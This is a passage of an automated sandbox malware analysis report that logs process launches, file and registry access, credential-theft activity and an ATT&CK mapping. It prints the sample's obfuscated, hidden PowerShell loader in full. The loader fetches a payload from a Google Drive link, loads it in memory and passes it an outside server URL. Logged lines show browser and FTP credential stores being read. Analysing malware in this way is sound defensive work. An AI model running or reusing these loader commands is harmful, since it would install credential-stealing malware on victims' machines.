a3dpdghncmvhdhroawducy50suyilcikru5wokfquerbvefcz29vzhroaw5nc3dpdghncmvhdgnvbwviywnrd2l0agdyzwf0dghpzy52ylmildasmck7c1rhunqtc2xlzvaomyk7u3rhcnqgicagicagicagicagicagicagicagicagicagicagicikzu52okfquerbvefcz29vzhroaw5nc3dpdghncmvhdgnvbwviywnrd2l0agdyzwf0dghpzy52ylmi'+[char]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnvunraw1hz2vvcmwgpsawverodhrwczovl2ryaxzllmdvb2dszs5jb20vdwm/zxhwb3j0pwrvd25sb2enkydkjysnjmlkptfbsvznskpkdjfgnnztnhnvt3libkgtc0r2vwhcwxd1ciawveq7vunrd2viq2xpzw50id0gtmv3lu9iamvjdcbtexn0zw0utmv0llcnkydlyknsawvuddtvq1fpbwfnzuj5dgvzid0gvunrd2viq2xpzw50lkrvd25sb2fkrgf0yshvq1fpbscrj2fnzvvybck7vunraw1hz2vuzxh0id0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcnkycovunraw1hz2vcexrlcyk7vunrc3rhcnrgbgfnid0gmfrepdxcqvnfnjrfu1rbulq+pjburdtvq1enkydlbmrgbgfnid0gmfrepdxcqvnfnjrfru5epj4wveq7vunrc3rhcnrjbmrleca9ifvduwltywdlvgv4dc5jbmrlee9mkfvduxn0yxj0rmxhzyk7vunrzw5ksw5kzxggpsbvq1fpbwfnzvrlehqusw5kzxhpzihvq1flbmrgbgfnkttvq1fzdccrj2fydeluzgv4ic1nzsawic1hbmqgvunrzw5ksw5kzxgglwd0ifvduxn0yxj0sw5kzxg7vunrc3rhcnrjbmrlecarpsbvq1fzdgfydezsywcutgvuz3roo1vduwjhc2u2nccrj0xlbmd0aca9iccrj1vdjysnuscrj2vuzeluzgv4ic0gvunrc3rhcnrjbmrledtvq1fiyxnlnjrdb21tyw5kiccrjz0gvunraw1hz2vuzxh0lln1ynn0cmluzyhvq1fzdgfydeluzgv4lcbvq1fiyxnlnjrmzw5ndggpo1vduwjhc2u2nfjldmvyc2vkid0glwpvaw4gkfvduwjhc2u2nenvbw1hbmquvg9dagfyqxjyyxkoksbqexogrm9yrwfjac1pymply3qgeybvq1ffih0pwycrjy0xli4tkfvduwjhc2u2nenvbw1hbmqutgvuz3rokv07vunry29tbwfuzej5dgvzid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzyhvq1fiyxnlnjrszxzlcnnlzck7vunrbg9hzgvkqxnzjysnzw1ibhkgpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkfvduwnvbw1hbmrcexrlcyk7vumnkydrdmfptwv0ag9kid0gw2rubglilklplkhvbscrj2vdlkdlde1ldghvzcgwverwqukwveqpo1vduxzhau1ldghvzc5jbnzva2uojysnvunrjysnbnvsbcwgqcgwver0ehqusutptdayjvnht0wvnjmvmtqxljynkyc3ms4zlji5ms8vonb0dggwveqsidburgrlc2f0axzhzg8wveqsidburgrlc2f0axzhzg8wveqsidburgrlc2f0ascrj3zhzg8wveqsidburefkzeluuhjvy2vzczmymfrelcawverkzxnhdgl2ywrvmfrelcawverkzxnhdgl2ywrvmfreldburgrlc2f0axzhzg8wveqsmfrezgvzyxrpdmfkbzburcwnkycwverkzxnhdgl2ywrvjysnmfreldburgrlc2f0axzhzg8wveqsmfrezgvzyxrpdmfkbzburcwwvccrj0qxmfreldburgrlc2f0axzhzccrj28wveqpkscrjzsnks1yrxbsywnfj1vduscsw2niyvjdmzygic1yrxbsywnfjzburccsw2niyvjdmzkgic1yrxbsywnfichby0hhul04mctby0hhul0xmjerw2niyvjdmtiyksxby0hhul0xmjqpihwuicgor0vulxzhuklhqkxliccqbwrykicplm5htuvbmywxmswyxs1kb0lojycp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('ucqimageurl = 0tdhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1aivgjjjv1f6vs4suoybnh-sdvuhbywur 0td;ucqwebclient = new-object system.net.w'+'ebclient;ucqimagebytes = ucqwebclient.downloaddata(ucqim'+'ageurl);ucqimagetext = [system.text.encoding]::utf8.getstring'+'(ucqimagebytes);ucqstartflag = 0td<<base64_start>>0td;ucq'+'endflag = 0td<<base64_end>>0td;ucqstartindex = ucqimagetext.indexof(ucqstartflag);ucqendindex = ucqimagetext.indexof(ucqendflag);ucqst'+'artindex -ge 0 -and ucqendindex -gt ucqstartindex;ucqstartindex += ucqstartflag.length;ucqbase64'+'length = '+'uc'+'q'+'endindex - ucqstartindex;ucqbase64command '+'= ucqimagetext.substring(ucqstartindex, ucqbase64length);ucqbase64reversed = -join (ucqbase64command.tochararray() pyz foreach-object { ucq_ })['+'-1..-(ucqbase64command.length)];ucqcommandbytes = [system.convert]::frombase64string(ucqbase64reversed);ucqloadedass'+'embly = [system.reflection.assembly]::load(ucqcommandbytes);uc'+'qvaimethod = [dnlib.io.hom'+'e].getmethod(0tdvai0td);ucqvaimethod.invoke('+'ucq'+'null, @(0tdtxt.ikol02%sgol/63/141.6'+'71.3.291//:ptth0td, 0tddesativado0td, 0tddesativado0td, 0tddesati'+'vado0td, 0tdaddinprocess320td, 0tddesativado0td, 0tddesativado0td,0tddesativado0td,0tddesativado0td,'+'0tddesativado'+'0td,0tddesativado0td,0tddesativado0td,0t'+'d10td,0tddesativad'+'o0td))'+';')-replace'ucq',[char]36 -replace'0td',[char]39 -replace ([char]80+[char]121+[char]122),[char]124) |. ((get-variable '*mdr*').name[3,11,2]-join'')"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
        Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: dump.pcap, type: PCAP
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: dump.pcap, type: PCAP
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information121
        Scripting
        Valid Accounts23
        Exploitation for Client Execution
        121
        Scripting
        1
        DLL Side-Loading
        1
        Deobfuscate/Decode Files or Information
        2
        OS Credential Dumping
        1
